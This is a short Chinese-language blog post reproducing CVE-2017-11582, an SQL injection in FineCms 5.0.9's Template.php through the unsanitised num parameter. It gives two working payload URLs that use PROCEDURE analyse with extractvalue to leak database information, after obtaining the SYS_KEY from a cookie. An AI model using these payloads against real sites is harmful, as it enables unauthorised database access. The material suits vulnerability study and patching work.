FineCms 5.0.9 通过$system[num] 参数进行SQL注入漏洞CVE-2017-11582

漏洞描述

dayrui FineCms 5.0.9通过对library/Template.phpaction=relatedaction=tags请求中的num参数进行SQL注入漏洞CVE-2017-11582
 


 

漏洞复现

文件/finecms/dayrui/libraries/Template.php函数 list_tagaction=tagsaction=related$system['num']参数插入到 sql 查询中,没有经过任何验证、清理。

只有 5.0.0<mysql<5.6.6 我们可以使用 analyse() 进行 sql 注入获取数据。

查看网站并从库克获取 SYS_KEY

有效载荷是

http://finecms.com/index.php?c=api&m=data2&auth=202cb962ac59075b964b07152d234b70¶m=action=related%20catid=1%20tag=1,2%20num=1/**/PROCEDURE/**/analyse(extractvalue(rand(),concat(0x3a,version())),1)
http://finecms.com/index.php?c=api&m=data2&auth=202cb962ac59075b964b07152d234b70¶m=action=tags%20catid=1%20tag=1,2%20num=1/**/PROCEDURE/**/analyse(extractvalue(rand(),concat(0x3a,version())),1)
------本页内容已结束,喜欢请分享------

感谢您的来访,获取更多精彩文章请收藏本站。

© 版权声明
THE END
喜欢就支持一下吧
点赞11赞赏 分享
评论 共2条
头像
欢迎您留下宝贵的见解!
提交
头像

昵称

取消
昵称表情代码图片
    • 头像谨惨0
    • 头像出魔0